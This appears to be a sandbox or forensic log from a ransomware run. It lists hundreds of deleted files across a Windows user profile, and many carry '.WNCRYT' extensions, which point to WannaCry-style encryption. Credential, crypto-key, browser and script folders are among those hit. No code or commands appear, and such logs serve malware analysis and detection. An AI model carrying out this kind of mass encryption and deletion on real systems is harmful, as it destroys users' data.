DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52\~SD24C4.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53\~SD24C5.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54\~SD24C6.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55\~SD2505.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56\~SD2535.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57\~SD2556.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58\~SD2566.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59\~SD2577.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6\~SD2587.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60\~SD25A8.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61\~SD25C8.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62\~SD25F8.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63\~SD2618.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\~SD2629.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8\~SD262A.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9\~SD262B.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host\~SD262C.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin\~SD262D.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\log\~SD262E.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\security\~SD263E.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp\~SD263F.tmp
DeletedFile: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp\si\~SD2640.tmp
DeletedFile: C:\Users\user\AppData\Roaming\~SD2641.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Adobe\~SD2652.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Adobe\Acrobat\~SD2653.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\~SD2654.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Adobe\Flash Player\~SD2655.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\~SD2656.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Adobe\Headlights\~SD2657.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Adobe\Linguistics\~SD2658.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Adobe\LogTransport2\~SD2678.tmp
DeletedFile: C:\Users\user\AppData\Roaming\com.adobe.dunamis\~SD2698.tmp
DeletedFile: C:\Users\user\AppData\Roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\~SD26E8.tmp
DeletedFile: C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\~SD2746.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Identities\~SD27A5.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Identities\{62195DA6-B982-4CC2-B681-2834060304B1}\~SD2804.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Media Center Programs\~SD2834.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\~SD2844.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\AddIns\~SD2855.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\~SD2866.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\~SD2876.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Credentials\~SD2887.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Crypto\~SD28A7.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\~SD28C7.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD28E8.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\~SD2908.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\~SD2909.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\~SD2929.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Excel\~SD2949.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\~SD2979.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\~SD29A9.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\~SD29BA.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\~SD29EA.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\~SD29FA.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\~SD2A2A.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\~SD2A5A.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\~SD2A7A.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\MMC\~SD2AAA.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Office\~SD2ADA.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\~SD2B0A.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Proof\~SD2B3A.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Protect\~SD2B79.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD2BC8.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Speech\~SD2C08.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\~SD2C38.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\~SD2C68.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\~SD2C88.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\~SD2CD7.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\~SD2CE8.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\~SD2D17.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\~SD2D47.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\~SD2D96.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\~SD2DA7.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\~SD2DD7.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\~SD2E93.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\~SD2EA4.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\~SD2EC4.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\~SD2EE5.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\~SD2EF5.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\~SD2EF6.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\UProof\~SD2EF7.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Vault\~SD2EF8.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\~SD2EF9.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\~SD2F0A.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Low\~SD2F0B.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\~SD2F0C.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\Low\~SD2F0D.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\~SD2F0E.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\Low\~SD2F0F.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\~SD2F10.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low\~SD2F20.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\IEDownloadHistory\~SD2F21.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\~SD2F22.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\~SD2F52.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\~SD2F63.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\~SD2F83.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\Low\~SD2F94.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\~SD2FA4.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\~SD2FB5.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\~SD2FF5.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\~SD3044.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\~SD3093.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SD30C3.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SD3102.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SD3132.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD3162.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD3182.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD31A2.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD31C3.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\~SD31D3.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\~SD3203.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\~SD3233.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\~SD32C1.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg.WNCRYT
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Word\~SD331F.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\~SD3330.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\~SD337F.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Extensions\~SD33AF.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\~SD33DF.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\~SD340F.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\~SD341F.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings\~SD3420.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\~SD3431.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\~SD3432.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\bookmarkbackups\~SD3443.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\~SD3444.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\events\~SD3445.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\~SD3446.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\~SD3447.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\2024-08\~SD3457.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\~SD3458.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\db\~SD3459.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\events\~SD345A.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\pending_pings\~SD345B.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\tmp\~SD347C.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\minidumps\~SD348C.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\saved-telemetry-pings\~SD348D.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\security_state\~SD348E.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\sessionstore-backups\~SD348F.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\settings\~SD34A0.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\~SD34A1.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\default\~SD34A2.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\~SD34A3.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\~SD34A4.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\~SD34A5.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\~SD3532.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\~SD35A1.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\~SD35D1.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\~SD3610.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\~SD3650.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\~SD369F.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\temporary\~SD371D.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\~SD378B.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\failed\~SD37BB.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\toFetch\~SD37EB.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yivbg7nf.default\~SD380B.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Skype\~SD385A.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Skype\RootTools\~SD388A.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Sun\~SD38AA.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Sun\Java\~SD38BB.tmp
DeletedFile: C:\Users\user\AppData\Roaming\Sun\Java\Deployment\~SD38DB.tmp
DeletedFile: C:\Users\user\Contacts\~SD38EC.tmp
DeletedFile: C:\Users\user\Desktop\~SD38ED.tmp
DeletedFile: C:\Users\user\Documents\~SD38FE.tmp
DeletedFile: C:\Users\user\Documents\WindowsPowerShell\~SD391E.tmp
DeletedFile: C:\Users\user\Downloads\~SD393E.tmp
DeletedFile: C:\Users\user\Favorites\~SD396E.tmp
DeletedFile: C:\Users\user\Favorites\Links\~SD397F.tmp
DeletedFile: C:\Users\user\Favorites\Links for United States\~SD39BE.tmp
DeletedFile: C:\Users\user\Links\~SD39DE.tmp
DeletedFile: C:\Users\user\Music\~SD3A0E.tmp
DeletedFile: C:\Users\user\OneDrive\~SD3A2E.tmp
DeletedFile: C:\Users\user\Pictures\~SD3A4F.tmp
DeletedFile: C:\Users\user\Saved Games\~SD3A6F.tmp
DeletedFile: C:\Users\user\Searches\~SD3AAE.tmp
DeletedFile: C:\Users\user\Videos\~SD3AFE.tmp
DeletedFile: C:\vlmcsd\~SD3B2D.tmp
DeletedFile: C:\BOOTSECT.BAK.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\header.bmp.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\SplashScreen.bmp.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\watermark.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\BoxstarterShell.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\chocolateyUninstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Init-Settings.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Test-Admin.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\bin\RefreshEnv.cmd.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1.WNCRYT
